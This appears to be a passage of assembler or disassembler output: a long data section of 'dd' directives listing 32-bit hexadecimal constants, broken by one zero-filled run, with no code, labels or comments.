dd 84B54A6Fh, 2C7BDFFEh, 0F226B7A4h, 0B6FF1C5Ah, 68923503h
dd 132CCEFBh, 0F1F1BD92h, 0FC3AC141h, 2B4C44A1h, 6566D5D4h
dd 0D5945393h, 1A90690Dh, 310E2E1h, 0E34070FFh, 0A88691CFh
dd 1471CFE7h, 0DFC2784h, 5AB3120Dh, 0B70260AEh, 6C769916h
dd 75873A7Eh, 565CC510h, 7A23A285h, 93068B25h, 49492B4Eh
dd 26304324h, 0F4467832h, 0B9930291h, 6289241Ah, 98AD9593h
dd 5AE4DEB7h, 0DFD1684Dh, 43036270h, 7326E9B8h, 0BCF6516Ch
dd 54E0254Dh, 0DAD6C8C5h, 9942CD6Dh, 77437275h, 2C365EBEh
dd 2A3B4138h, 0AA19858Ch, 4005260h, 422C0E14h, 4D76E4D3h
dd 37407D7Ah, 374FDFDh, 0F6DFC1F0h, 0C29C1032h, 0F41901BBh
dd 0C4AA1563h, 1278D7CAh, 0E8D9B4BFh, 0CD4F9379h, 0F9DE3B3Ch
dd 0C5AF228Ch, 1565D7DBh, 6ADAA19Fh, 29841516h, 0DBE9B1B6h
dd 41CFFB7Ch, 0E6D74ACDh, 20A2110Bh, 0EE13A444h, 986A6329h
dd 0A57E05B9h, 6F953736h, 8080792h, 0F92F9C9h, 0FB85F496h
dd 45BB0F5Ch, 0F69F7F4h, 84806510h, 0F54C3A09h, 0F6807BA6h
dd 0D85EFDE7h, 9BA813D4h, 17F261B7h, 8CBAF7A8h, 0ABB4E947h
dd 6143C256h, 3E289D05h, 0A8AC829Fh, 0D1811A3Dh, 7CF9A0E1h
dd 7EF8286Ch, 8E4AF6C5h, 0ED19C5F8h, 413F8AB8h, 4839D3F8h
dd 0D5C41C76h, 6E07549Ah, 0E2544FAAh, 0D97A8D38h, 0FAD44349h
dd 47455D00h, 3BEAEA85h, 0D7813AFBh, 21F7D0E3h, 0E0CFB3B1h
dd 0B48DFDF3h, 36FCBE46h, 0B4EA1BEEh, 941EB87Eh, 3141C165h
dd 2C39EEA9h, 3E933DE3h, 0E3C03375h, 528B0922h, 0DFDC6DFBh
dd 945CF746h, 56BAE1A6h, 172C66FBh, 0F29E93B8h, 0BD5405E8h
dd 3354C21h, 8E25C21Dh, 0BB984BB7h, 64BC2818h, 0EA307A79h
dd 0FD560BF9h, 8DBAF290h, 8B02B84Eh, 0AE83F9D5h, 59939428h
dd 0E3BCC37Eh, 0AC5B7574h, 4754C853h, 3B048308h, 8AE3627Dh
dd 5324BFE6h, 9DCC60EBh, 0A3E2E2Eh, 30097A7Fh, 7B56A995h
dd 56630B0Bh, 0CD6797Dh, 0D2A26216h, 0A079E3C3h, 0E9A86131h
dd 330C7F92h, 290792C4h, 5360590Eh, 0FD97472h, 0CEBF6893h
dd 0A37BEBEEh, 0EEAF6565h, 5E0E142Ch, 0C058C7C7h, 3837EE43h
dd 84EC6B71h, 7415226h, 0A216B9BDh, 0B8C83736h, 1936357Fh
dd 7C5BCAC8h, 0FC89CD81h, 0D56A075Dh, 4BDBB1D2h, 0C3557BA0h
dd 0A59A683Ah, 49807BD5h, 0DF5EFDE1h, 1FDDD792h, 0D5679E36h
dd 0EF3B9A82h, 0FBD6B7A4h, 78967957h, 3F198311h, 49527BD0h
dd 21F20A70h, 4BA534C8h, 356EFDFCh, 561209A4h, 79D1706Bh
dd 4219824Dh, 0A8102CD3h, 1C3BE215h, 4DF8574Ah, 44882550h
dd 70D7F9C9h, 0C5544347h, 31FF886h, 9A1B5B5Dh, 0C1522010h
dd 31FBFFE4h, 0BA47B382h, 315F03AAh, 15F4986h, 4721908Fh
dd 926A295Dh, 0E18AA323h, 0A4B87D19h, 0EA48B68Bh, 0B890FF1Eh
dd 74FA77C9h, 75A2D463h, 0D222928Ch, 113D0753h, 670129A9h
dd 18187692h, 0E8C55303h, 281CD9B3h, 757F95A5h, 27EAD11Eh
dd 8B92829h, 2B0372C3h, 271C853Dh, 3B99534Fh, 7E04FEAh
dd 0FD215E1Bh, 1F7DECDEh, 0E4BC2BB5h, 0DD735549h, 77758213h
dd 0C199848Ch, 2AEEFF52h, 690CBBBBh, 0EA1083C4h, 0DB13515Ah
dd 0B0750D58h, 13723EBCh, 0B5E97F78h, 7DE52BD4h, 2200B1A4h
dd 5E3F2180h, 50F33E32h, 340C5C6Bh, 81072632h, 0F7B3679Ah
dd 40296B58h, 0B262F1F1h, 0A47BEAE2h, 83B25B71h, 536E1112h
dd 50CD38C8h, 4FA2213Eh, 20DA2F9Bh, 0A6B02D6Dh, 0F67EDDC2h
dd 0F0CB3750h, 6C43D005h, 51CE359Bh, 40A52439h, 26F42ECBh
dd 0A90BF7A7h, 0F8D1A1A5h, 66346B6Ah, 3D25A885h, 787AC949h
dd 0E083DA8Dh, 99319961h, 532EC527h, 6E7DF2F4h, 0F2EA61B5h
dd 4018876Fh, 67E08DD1h, 0D39B0766h, 2CB6D9EFh, 0D3B5AD9Dh
dd 0B0B7C6BCh, 745ABB42h, 432BBACDh, 8EF7627h, 0D69E2D5Dh
dd 2FC7F2ECh, 0EC42B080h, 0B3BAC9CDh, 74BC41CDh, 0B91E8D9Eh
dd 0A04BBF42h, 8578CB21h, 4B8D0F2Eh, 3C18D6D0h, 0DFFE8595h
dd 0B2BB2724h, 3B4EFDF5h, 4159D9A3h, 2AE6ECAFh, 0C47D3FB4h
dd 6C07DCB5h, 0D2C357F9h, 0BA6EC751h, 0F224A38Fh, 956DDCCBh
dd 20FA22ABh, 4EFE8F90h, 3F4E3412h, 0BB940303h, 4353E62Ah
dd 0AA153D91h, 7ADBB973h, 0D22FA4D2h, 7F044342h, 8A1FBAD6h
dd 8EBB9F93h, 2395DB4Fh, 49EE1A90h, 1E7C2267h, 0E4BD2D89h
dd 0E6F761Fh, 2E50BFBEh, 54650263h, 0AD47FF3h, 0DF21C210h
dd 3FFF5ABh, 0E7F01F18h, 131F4F1h, 98D2C2F2h, 0CB62FC0Ch
dd 0D8D0504h, 0E2CF99F4h, 0A149D8DBh, 0C686A7CDh, 0CB5D7C4Bh
dd 4E66F670h, 0A35F00Fh, 48EA6973h, 55A06224h, 0A47DBF6Fh
dd 0D6475335h, 3B642533h, 0ECCC379Bh, 23A3223Eh, 13ED5D1Ah
dd 5DFE1B29h, 1070EEEEh, 84442676h, 3E7B9DB0h, 0D35CCBCAh
dd 0E18780EAh, 41A65F6Eh, 4BD03D58h, 0E909F1C1h, 780F3807h
dd 0EE15FDD4h, 0C7FBC45h, 0E4240052h, 1A5E3352h, 62442A69h
dd 0DFE0A791h, 42D3B4Ah, 69B463DEh, 0F8E9F5DDh, 20AF423Fh
dd 13EA37EFh, 6571AA1Ah, 32BC7C24h, 0B759B242h, 7CA90282h
dd 665E4E4h, 0E11A2528h, 6DF95857h, 5EF79A33h, 888BCACAh
dd 0CCE57FF1h, 379C818Dh, 0A3972828h, 9A07A8E1h, 0ABFC5B5Ah
dd 5C75F33Eh, 0DCDEADFDh, 0FEB21744h, 492291F8h, 16948D5Ah
dd 0DC85315Ch, 0E0EFB92h, 0E2B7B786h, 0B8A21478h, 0E23B3CAh
dd 0B4DAAF16h, 0A6EB5423h, 0B4B81716h, 7E021B6Fh, 13DE45E9h
dd 3095342Fh, 34EF09C9h, 4CC85695h, 981BB08Fh, 0CD86BFD6h
dd 0AE8C7442h, 757E8DF7h, 0BEF2D38Dh, 57D0AE1Dh, 61182F67h
dd 0E8BE3D2h, 0E48E0175h, 1E3BF2FEh, 7CD8C08Fh, 0C0EF52Dh
dd 81E56479h, 0E1A5A1C8h, 9E47D6AEh, 0D3DB64A4h, 0A42084F3h
dd 7B64F3F5h, 0F4D98087h, 26455765h, 0ADD30B5Ch, 0BC0E6C65h
dd 0BB953302h, 655F2D28h, 5256533Ah, 38F1103Fh, 20C097CDh
dd 291160A1h, 0C147C6D1h, 81A5575Bh, 772BE41Bh, 0ED3FA1BBh
dd 0E496207Eh, 3F82313Fh, 0E379789h, 0E2D4BCB7h, 85896575h
dd 5471F1F3h, 0EA328FBFh, 0A1C86461h, 4A85050Dh, 1648CCF4h
dd 0D9E69198h, 92A56F67h, 7C73E3F6h, 0F405ACADh, 0B1FA456Bh
dd 7C990213h, 104FC9DEh, 0DFEFB3A8h, 9AB1485Bh, 2C75D9EBh
dd 0D61AB1B8h, 0BDCC6848h, 78850700h, 2FDDFDh, 0ECEC949Eh
dd 91A73700h, 3974FEE5h, 0FD27B1B1h, 0B5D9736Eh, 70931D06h
dd 251FC1DEh, 0B3F88893h
dd 0A8900A17h, 372CEDAh, 0F300958Bh, 0B6C04D53h, 75A1180Ch
dd 322DBDAh, 0F5D38D8Ah, 9AAB3A32h, 2C75E6FEh, 0FC05A8A8h
dd 0A4F3794Ah, 546F031Dh, 2449CAD2h, 0DCF47060h, 71B2043Eh
dd 4C2495E7h, 0D23C8EDDh, 0ADC92E37h, 446A0A1Fh, 1838D594h
dd 0CCFA6B76h, 6B89612Ch, 129F7F0h, 0B939A2A9h, 8CDB4041h
dd 4B631D12h, 331CEBB7h, 0F5F32855h, 28AD1B1Fh, 2045EDBFh
dd 96469197h, 0E5BFC678h, 0AE547876h, 4972272Dh, 0AD19CD0Ah
dd 0BE66546h, 79020B63h, 77B9E7D6h, 8293452Fh, 0D3B9F067h
dd 2555F4E8h, 0B0B132A1h, 30683E7Ch, 7B47BC60h, 8E8A5764h
dd 9D4E3403h, 53AA297Eh, 71DD4A63h, 47A2213Bh, 21C76FDCh
dd 1DBC5EA2h, 5B306116h, 0CC986CDh, 0C7A70CB0h, 0EA5BFAE5h
dd 0CBA51517h, 2D7AA10Ah, 0B7389789h, 0A881F066h, 0E462BFB4h
dd 514584B2h, 7A50A7CCh, 0FE845E83h, 338EE25Fh, 104EAEA0h
dd 0AB84FB1Ah, 0B7886E3Ch, 7254C3ABh, 95F42FCFh, 0DAAB2A35h
dd 70E110A2h, 0CD6FDA9h, 5178090Ch, 0C7FA99AAh, 35DB0F88h
dd 63B42CD0h, 0D4AE1D17h, 42BB2136h, 236FE3E1h, 4E8AB5B4h
dd 0CAF85ED7h, 0BD5F658Bh, 3BEA292Ah, 0D7810CE0h, 20FA6E00h
dd 0FFBBE5B1h, 0B4BDD0DAh, 0FDD74BADh, 1565CC8Eh, 0C32F8F91h
dd 8EF17F71h, 0DCA86D28h, 5D6C5F21h, 0B79717FEh, 48864948h
dd 1977C1DEh, 1938DDBh, 0DD860ECCh, 7651A65Dh, 1B18BBD2h
dd 0BA936A03h, 0FC8B0C4Bh, 7D0D6401h, 68975DDEh, 6DE90B5Ch
dd 1A2F8DE4h, 0EFC136BBh, 0D7963522h, 1C881D4Eh, 1299897h
dd 0EFE71EB1h, 1CBC1B07h, 1D2DB8E1h, 774456BEh, 93CC0808h
dd 3BD00014h, 1F60DFB4h, 0DCE01BE4h, 0EBF1E02h, 3009787Dh
dd 822B2B6h, 0A5E86562h, 0F3B65515h, 66044708h, 45FD6EE7h
dd 0E6C2011Ah, 6181F64Bh, 0F455F4DDh, 0F6B3F98Bh, 9A160957h
dd 59028DE1h, 0A37F8279h, 59483434h, 363F6722h, 5DE54A9Eh
dd 21A2213Dh, 0ED13A9A6h, 0F8B063C5h, 0A67EDDCDh, 496DB467h
dd 3912B1A0h, 0A33F5F47h, 98F51424h, 15855F37h, 5F3ACFF4h
dd 3C7E70F0h, 0F2FB16DBh, 494F4406h, 11D340EFh, 9DA82737h
dd 0AD7F670Ah, 620B8A0Dh, 0FCD4A5A7h, 60316F6Ch, 3F28AB63h
dd 54F42F88h, 14AB2A36h, 2BDB9AE6h, 0BD6ADACh, 50780904h
dd 0C8C33DCDh, 0E9E4D89h, 0DA64E3C6h, 3D9D4249h, 0E107953Fh
dd 7D0D3568h, 0E6DCF9C9h, 0B13C771Ch, 82E1727Eh, 0BF729A53h
dd 87C97620h, 0D3C0825Dh, 0EE834C4Dh, 0B5BDE9B0h, 0AAA12310h
dd 0CDAC59BCh, 925AE996h, 8AE57272h, 75AF3C3Ch, 4272234Ah
dd 2D6FFFCFh, 1EA6564h, 3E3C7A53h, 956033A8h, 96E52526h
dd 78413823h, 3E0D96F0h, 2E6C024Fh, 4ED600Dh, 4E26997Dh
dd 0CB278DDFh, 80EF5C4Ch, 6A66071Eh, 0E0B3EBBCh, 0BEA62EDFh
dd 0F855C2DCh, 3929A8B4h, 9B72E12Ah, 1BBC417Ah, 1E2A6CE0h
dd 0AADA33BFh, 4C993816h, 3ACE95EFh, 37ECD9Bh, 0B590711Ah
dd 233C2E1Fh, 0DE9CF574h, 2B52F1DDh, 929D615Bh, 0DE43D07h
dd 84D01E9Eh, 5E82FA00h, 0D87FB2CDh, 340C4B6Eh, 0F63DCFB1h
dd 389F0E1Ch, 20C531CDh, 5A3E49A1h, 0F72CEAEBh, 0DE8E777Ah
dd 7B4B504Ch, 14A7C784h, 0CA923D53h, 13EB33C8h, 0E8B8A4A4h
dd 0A74EF558h, 5D75BA61h, 0D212B1ADh, 7BA43B47h, 0CDA518FDh
dd 58A6095Eh, 347DE9EEh, 0E6CDB4DFh, 0B25EC53Bh, 0B815B4A8h
dd 0B2DAC20Eh, 43A8171Ah, 19F26409h, 978E27AAh, 0F484C3ECh
dd 0DA0780B3h, 15F087B7h, 99E2F20h, 0E387D7A6h, 98FA6464h
dd 663EAFBDh, 0B1171A76h, 91854041h, 431B8B8Bh, 0A1C9462Bh
dd 122F1D2Eh, 1FF866F7h, 3953BE0h, 2675ABFAh, 0FCE46F89h
dd 33474D08h, 83EFBEDAh, 4C4E2021h, 22CB4603h, 0D1C75158h
dd 0B6BDDC5Bh, 72FE3347h, 79013A15h, 69589DAh, 0DC840F9Dh
dd 0A1F1ADE8h, 6F47B73Fh, 339D408Bh, 8EEBB549h, 7B043517h
dd 6BE81ADCh, 0DFB71608h, 296B7005h, 0E7B5BBD3h, 0BBA42FC6h
dd 0B21B5CFh, 4E26F611h, 0DFD4CDFh, 0E18A098Bh, 78566318h
dd 59F82943h, 7E120636h, 6A1D540h, 0ECA79998h, 9B43C226h
dd 9555249Dh, 46F88983h, 7850BF2Bh, 487C2257h, 0F5B07766h
dd 6401AD0Eh, 4CCB68E5h, 56C01F0Fh, 0C7589179h, 0EEDE3D3Dh
dd 0C4AD2CB3h, 198F563Fh, 5309F9Eh, 60EC17BBh, 67C3021Eh
dd 0B919583Fh, 4E668A50h, 71AF5F0Fh, 34AED252h, 52D363B5h
dd 0B67DA1E9h, 0A7D4377Fh, 1354747Dh, 8EB848C0h, 9BABF2D3h
dd 3C91850h, 0D066975Bh, 97531153h, 0F0D5D038h, 14368281h
dd 0AA7CB3FDh, 0F7863B35h, 38D57A7Bh, 181CD09Fh, 0A0F1D4D1h
dd 0BD857471h, 0C24185A4h, 0B7742B5Bh, 7C6D9918h, 73F36261h
dd 306BFBAAh, 8144610Bh, 7B443E0Eh, 40299DB5h, 9181D1BBh
dd 82A1D270h, 1CF6608Ch, 21A88ADh, 4FDFF7FDh, 0C9F9A4D4h
dd 4FD8088Ah, 0E56E3F84h, 0D6AF1E16h, 3F21D5EAh, 3A15B180h
dd 9F4A6F05h, 3C504474h, 0F392DAF3h, 9058FB28h, 0CC8084A2h
dd 0AFFC6B5Ah, 5C6B4A3Eh, 0DC40D6FDh, 0AC8E1647h, 659F046Fh
dd 6BE8DAEAh, 4D9A5A24h, 907290E6h, 6F789B49h, 16600CB0h
dd 0E9BC5B3Ch, 0B4DA62C8h, 7679AFBDh, 0DFCFAA2Fh, 0E7899B84h
dd 0CFC67492h, 0BBA528FCh, 0F358EABFh, 0B17B2E7Eh, 0A85D514Ah
dd 8E06AA29h, 2A054467h, 452697C8h, 41980773h, 37CE38DAh
dd 0AF961A98h, 9B74D3CCh, 61793C58h, 2E3857D3h, 7851C0BFh
dd 0EF658FCFh, 0E3E55462h, 0ABD16393h, 9E7324B8h, 0C93E85A2h
dd 0CE5D7A48h, 4B78CE57h, 3B668E0Ch, 0D53D35Ah, 0D2B8A09Eh
dd 0A14AD9EBh, 15923358h, 42220EEh, 719743C5h, 0C7A1B48Bh
dd 402B7158h, 0A37C9F1h, 0A415ED81h, 0BB073635h, 1CE01581h
dd 79D9C9F8h, 0F8201CEDh, 9AEE5D5Fh, 6D07A121h, 0AC0D62EEh
dd 7DCA0908h, 0A249014h, 0EE0F9DCBh, 58584615h, 16C14C4Bh
dd 6FC55124h, 0AA87F275h, 0CCD563Bh, 0D278131h, 96F530CEh
dd 53AA2934h, 9DFB9C99h, 633DAF43h, 9D9D707Dh, 3FE33F0Eh
dd 104B4A84h, 0DB67B880h, 0E3AAA9E4h, 89086654h, 66708458h
dd 34863872h, 0F9D34184h, 0C69445B9h, 8D56E5CBh, 0BEE14E4Fh
dd 1FF56978h, 2CD64DE0h, 368CCBD6h, 82524A84h, 0CF208F8Eh
dd 0A059FB52h, 9238E121h, 42AED452h, 0BE75B5B3h, 47783FFEh
dd 7A50A9B0h, 4913A2BFh, 2B509051h, 0DCB63EE8h, 0E703BD5Eh
dd 91BE4940h, 89B48788h, 0D1E4C7Ah, 0B520DE24h, 0C5E2E83Eh
dd 9C0E273Fh, 60D37164h, 70647AD1h, 0E3AC84D4h, 0FC8E263Ah
dd 0CC6086E2h, 0EB73ED9Ah, 0DEF7A0F5h, 2F1237F8h, 32C2AEFFh
dd 666EF74Fh, 8DD89373h, 521CAB82h, 0D8FEBD20h, 6D362209h
dd 2F0978CEh, 489101F3h, 0F2B23C38h, 3AC8657Dh, 1E5BD0BCh
dd 0EF148994h, 86AB1F51h, 3801141Fh, 1A3CF8E0h, 0A0F26F7Fh
dd 6D9B2B76h, 2C5A83A2h, 8D419A9Dh, 0A0B17A1Ch, 4563100Eh
dd 1131E9A7h, 0BA8D7E76h, 78D3743Ah, 7B17959Fh, 0D11A849Bh
dd 0CEF90A5Eh, 5F7BE417h, 0B366BEA1h, 0B2D16733h, 36D23B30h
dd 3A4AC8C7h, 98BB828Ah, 0DEF7041Bh, 5A67E2EBh, 8860A8A1h
dd 45569C1Ch, 27C27AD2h, 0E2751AA8h, 576F71Bh, 0CB4F3449h
dd 506ACCF1h, 3A224BAh, 0CA2691E7h, 0AAF55452h, 61D72E97h
dd 40F25807h, 82FE7FBFh, 405C017Fh, 54BB0CF7h, 9BEC20C3h
dd 0F58D3E21h, 8FBF9BE1h, 0B18AFBD4h, 0FAD41B2Ah, 0B5F6D68Bh
dd 0FA982928h, 0CC3CAB3Fh
dd 0ADFB5A58h, 0A56FB285h, 87B171B5h, 7A73B5B8h, 465F1D57h
dd 0B6DF6C55h, 29482312h, 0EC75AECFh, 0D0CABD5Fh, 0B7A0D101h
dd 3305C2B4h, 2B1F3E58h, 0EE50DDA9h, 0FD9A2752h, 535C53C4h
dd 5678454h, 0CF933EDFh, 88E0AFA3h, 1EA35395h, 976FEEEEh
dd 0A5E16D15h, 17310671h, 741EF8E8h, 42B32E71h, 3BE0B0B1h
dd 5064CCDFh, 0CA4FF395h, 97BC7B63h, 7E47487Fh, 0F240BEEEh
dd 3F66F649h, 39B0D7AFh, 60C79BAAh, 628B7B0Dh, 0DBBCA5D1h
dd 73473120h, 847545CEh, 94A1F4F4h, 3A80017h, 0A9D18219h
dd 0E32FDA18h, 6DCD0302h, 0CCF3856Bh, 290694F9h, 0C01B0141h
dd 3C16A7A9h, 0A41C497Bh, 27741515h, 133AC9CDh, 20E7AC4Eh
dd 6858C7C7h, 365DEF48h, 12EC5BB2h, 0B1B4F9A3h, 0A64EC4D4h
dd 0EFC905DEh, 0BEDE580h, 0B3787F41h, 45C11424h, 4652DE7Fh
dd 5E389796h, 769FA85h, 1B34C5C4h, 3C158590h, 0CB604CABh
dd 0C72D184Dh, 93F26161h, 0BC3896F7h, 0FCBF7295h, 0D4B3278h
dd 0C8188786h, 0A961C693h, 57A41A1Ah, 1BF56488h, 6762EE5Ah
dd 0AF6672F9h, 86504040h, 623BAAA9h, 58E0DCF3h, 3DAE1D1Dh
dd 0E1079AC1h, 688832A0h, 0F001F9F9h, 0EB9EC84Bh, 416D4CA7h
dd 8A8C16E5h, 9238E823h, 0A7EE379h, 83448382h, 4A7201AAh
dd 0FED7E9AEh, 6FBC1B8Fh, 916AE9E9h, 0EB8408BEh, 0D890856Ch
dd 0EA48494Ah, 0B890FF70h, 31F9FCC2h, 15A892A2h, 7DB2D8E0h
dd 2149D871h, 6281121Dh, 7249D89Dh, 0ED6D89E3h, 89C9364Fh
dd 7E369520h, 8815DDDFh, 0E1BFDB90h, 8EF02572h, 77AFBA0Dh
dd 0E0C9A1F5h, 95D1401Dh, 51AB1F15h, 1214E1E2h, 1B43B0BCh
dd 0CBD69D8Ah, 0F3154140h, 8B9A0443h, 0CA2DF42h, 0DD04D8B0h
dd 9E75BB62h, 0C7F9E92Fh, 11295858h, 0F07A8A4Bh, 41171B46h
dd 0DD66572h, 2427D4A7h, 0A9326EEBh, 69D27333h, 0BF0C2318h
dd 4E65EB40h, 0CFDD0F0Fh, 23B91B59h, 78B9C573h, 0FC79658Fh
dd 0DDC289B6h, 380F7E4Eh, 7EA4534Ch, 0E917EEEDh, 0ECEC6B6Bh
dd 6D19C931h, 0B8CB12EEh, 0FC80708h, 0A394C14h, 8FD647CBh
dd 40A52425h, 26DF4DCBh, 0A6AF6A7h, 0AD340FF1h, 0CCB0A0Bh
dd 0D39E111h, 80EB32CEh, 2FA82728h, 29D9ACF4h, 9C8E27AAh
dd 5284C3DAh, 0C6FE3E8Bh, 0D5E7D187h, 8A51FC8Ch, 0E3ACBF98h
dd 0DFF56454h, 663EAD45h, 0B1EDABF7h, 0D33CADC0h, 0B3438ABAh
dd 0F5E112DBh, 53AE2D0Bh, 0D77BA4A7h, 0A84E404Fh, 839F817Fh
dd 0ECE98044h, 331EA78Dh, 0ECE6B0CBh, 0A8DD2C05h, 0CA9B791Fh
dd 93BB4C77h, 0ED65F988h, 1728B9BAh, 0B6DE6F42h, 0BE95F7BBh
dd 0CE80755Ch, 25FE48D5h, 0CAAFD6B6h, 0CD6EFFFFh, 259FC170h
dd 0B4911EA2h, 1E6DECF2h, 5FD12E76h, 5B037655h, 7222EF9Ch
dd 3094FC03h, 56DE2788h, 0E7B269C5h, 1B70EFF3h, 0DF3B21EDh
dd 773B4C2Eh, 0B3CEBFC9h, 439FEE02h, 7809AFB0h, 30D56667h
dd 9B075A21h, 55562C2Ch, 2E0759CDh, 784057BFh, 0E1580909h
dd 0AD4EB52h, 57C59C9Bh, 5C76E5E5h, 0B34D2F0Bh, 1FC7755Ch
dd 7533A41h, 0C4756C15h, 86E75655h, 0A00BBCAh, 4CF8F263h
dd 0EAF31985h, 0CBE37B93h, 7A94A43Ah, 150Dh dup(0)
dd 0F3F2D980h, 0FB81F5F4h, 267AF01Ch, 0FFFEFD20h, 8C820100h
dd 72FB19Ch, 2F669408h, 0B3B8110h, 0C3C29A69h, 0A016153Dh
dd 1B43CDD0h, 4ED69D1Ch, 0B222144h, 0BF293299h, 2B2A4D58h
dd 2E3088B7h, 0BE3A1C63h, 375A66CCh, 966D3838h, 0ABBFD291h
dd 0B3484564h, 2AC74544h, 4A493948h, 5F543ACDh, 0CFDD5190h
dd 0CE35978h, 5B9A8D94h, 5F5EBE15h, 0E4065460h, 0CFBAB3DFh
dd 78DFDCD1h, 0FCAAB0F7h, 0F4D88974h, 0EBBBC5ACh, 7B65FA80h
dd 0F47E7D7Dh, 0FBD20C62h, 0F9115887h, 0A3D414A8h, 3CDF808Fh
dd 0B135493h, 0FCDD9593h, 1CB50E0Ch, 11EEA014h, 0B517040Fh
dd 0E8AD1D25h, 201C0D0Ch, 0BA262EB5h, 0B3252415h, 8E98BA28h
dd 0E47D1611h, 3149E1C8h, 0B6C51AE4h, 15CA7CD3h, 0CEE64353h
dd 560258C7h, 0DFBAC4D3h, 1AD6D5D4h, 404D4844h, 434C3E24h
dd 36E2464Ch, 6C6FBBE3h, 0EB2A1E24h, 0EFEEFAD4h, 586434F0h
dd 3C5B6955h, 6F685E6Eh, 0FE51FD3Dh, 43878AD6h, 0EF064539h
dd 0B0A0915h, 5B827253h, 58868471h, 89858786h, 0F1196C18h
dd 5462A2A5h, 930A2160h, 0AC262524h, 7B4B9DE8h, 6472C22Bh
dd 0F3B73170h, 0BCC345A9h, 3B7A4A0Ah, 273D8DC6h, 434241AEh
dd 0DC45C12Fh, 4B8A7E84h, 837FD243h, 53525190h, 75CAD554h
dd 8F8F0EE5h, 0DBE95D9Ch, 8066584h, 0A01802EFh, 20F569A8h
dd 6FAEA622h, 0AC2C2EFBh, 3AD375B4h, 0E57AE3D2h, 0E97EE77Ch
dd 8383E980h, 4B118588h, 0F5DA89F2h, 8E521898h, 0F2E6E772h
dd 0CA9695C7h, 9A748161h, 342B9C9Bh, 0A3E2B241h, 0F7F7F6F6h
dd 0E0EA3EA7h, 7331ADECh, 0A53C74D0h, 0B7D8146Dh, 0FBCAE9B8h
dd 0B8A093BEh, 0FC0F8F83h, 9B0CF2AEh, 5365BC6Ah, 1344B59Bh
dd 3CF81661h, 16BCEDDEh, 87043ADFh, 2D7D9896h, 0B69052D3h
dd 0BBE56B93h, 816EC4Ah, 0B592545Eh, 305F3302h, 2B959B93h
dd 0F62AEB3Ah, 0F613CAB8h, 985181F2h, 1BB9F563h, 4215862Ah
dd 604755Bh, 0B7A5FE6Bh, 9C7CED13h, 8ADA5134h, 7AA72556h
dd 0BF5DF507h, 32D4DECEh, 77D45D15h, 0F26B1546h, 0F2E07B76h
dd 1B5C657Dh, 0E411D1FAh, 0A3143AE6h, 0DFE90F9Ah, 724C97AEh
dd 9755017Fh, 9A047A26h, 0D6A262E6h, 58C1E409h, 47B899DAh
dd 0AF4DC48Dh, 40F02158h, 3B3C5D2Bh, 0BAD526CAh, 66A495F4h
dd 32FED0E7h, 0FFA36D5Ah, 0E76791A0h, 5801429Fh, 72D04128h
dd 6400B8C5h, 56CA69FDh, 562C0CD2h, 96C0F222h, 0BE95DF3h
dd 0E7F4EC9Ah, 0BF77655Bh, 0C6935F70h, 25ECB7E1h, 0F328818Bh
dd 338C15C6h, 0F6A0D202h, 6BC9BDD3h, 0DE58CE7Ah, 5A260A3Ah
dd 8F902B8Dh, 97CCFDC6h, 9808E36Ah, 0FDEF71FEh, 509881E3h
dd 22BCEE1Eh, 8705D9EFh, 33ABD96h, 0AC53A1D3h, 7B6CB25Eh
dd 0B7E81E72h, 0E9506E86h, 2FF6501Dh, 15A23047h, 0B45E840h
dd 0E14054Bh, 0A4CF4443h, 5BCC929Eh, 0C644082Ah, 3B17E4B0h
dd 0F4071A4h, 8F38E198h, 147BE966h, 0C3B45ACEh, 0EE9F161Fh
dd 49B9D0Eh, 0A4D83697h, 0BE351586h, 0F1DAF9F1h, 80DB8DBEh
dd 6758DE72h, 0A6500436h, 5A73400Ch, 0DB793133h, 5898D8EAh
dd 0C6317AA1h, 4C7731A2h, 0BFC82F6h, 0BE7979D5h, 0C3C3C79Bh
dd 0E76DAC52h, 0D22C1D83h, 0B4DB9A7Ah, 73E4C8DFh, 7C249EC9h
dd 0F4BB4DBEh, 9E59DA35h, 23A33B7Bh, 643EE932h, 7091CC99h
dd 17884FF4h, 532A745Dh, 1F634AF4h, 0CE1DB062h, 30372900h
dd 6D74FF09h, 0E65D6E0Ah, 54ECDD63h, 0F72859A6h, 2FE9E93Dh
dd 0F6C38FCFh, 3043F329h, 0E718967Eh, 8EAE85B6h, 0FA8C087Fh
dd 7970A11Ch, 318F5BD1h, 0FC868DA6h, 83F7B1E2h, 4743EDF4h
dd 0C75029C0h, 2D3C6596h, 19BE7292h, 0E81F8D08h, 0B7A8EE6Ah
dd 33E0D8AEh, 2FF95FAAh, 156848FEh, 0C10C943Ah, 8D141F36h
dd 1F26D3B0h, 5BF57B86h, 0E8C8A32Ah, 4AB4E43Ch, 0CF2D9517h
dd 0C855DCDEh, 6634F815h, 484714E3h, 0BF4061E7h, 4558E6CEh
dd 0CE1FD90Ah, 98657A15h, 0EFE06182h, 17A0123Bh, 7DBC9BAh
dd 0BBB49AB3h, 0A6DE41B2h, 0DB79E943h, 5772E1EAh, 7A88F526h
dd 5F2DDCCDh, 19E5BF6Eh, 0E6D59543h, 0A7953B3Bh, 0BF3106E7h
dd 43B96CDEh, 0B068D9BFh, 0B371918Bh, 0C9AC6142h, 2CF279Eh
dd 6765754Fh, 3A544AF6h, 0F95A4047h, 6656736Ch, 6949237Eh
dd 5384C63Eh, 4BDDC422h, 0EAA98F43h, 0B5913BEAh, 625101EFh
dd 0C6FAE1B7h, 0FB19D9E3h, 0C564E48Ah, 81946BF8h, 1F2D90B5h
dd 2EDCCD73h, 8EC339BEh, 0E361B12Bh, 0B9902BF2h, 6B598C2Ch
dd 8008F95Fh, 134476BEh, 0C8219C55h, 0BA88111Ah, 0B48C9E55h
dd 0B14365D6h, 4D944651h, 0A7ACDD4Eh, 6755B81Dh, 7024159Bh
dd 6D24C502h, 0FD981B7Dh, 83A4E8A4h, 8D141F6Eh, 0B7DD8098h
dd 0D88CFDE3h, 2A6C8DEAh, 0D30022BEh, 80F964A2h, 0C875BD3Dh
dd 87F8FF56h, 84753D6Bh, 0FF306EFCh, 693C511Eh, 4A5809DBh
dd 0E00CAA11h, 0AF9D5142h, 425F6107h, 0DE90EDEEh, 63DE31BBh
dd 0A4A42972h, 729B0CD9h, 9755957Fh, 143C9026h, 0CF011926h
dd 786FA49Eh, 47B8BE16h, 3A0BCAAFh, 0BF29AE6Dh, 0FB0405D6h
dd 37688214h, 73A4D26Bh, 0AFE01143h, 0EB1C4D7Eh, 275889BAh
dd 9AC39BA7h, 0DFFD49A7h, 7F65986Eh, 255B92Eh, 27C35344h
dd 2CEF9260h, 0E8A18E18h, 0A19638FEh, 764008FBh, 91DFB8CEh
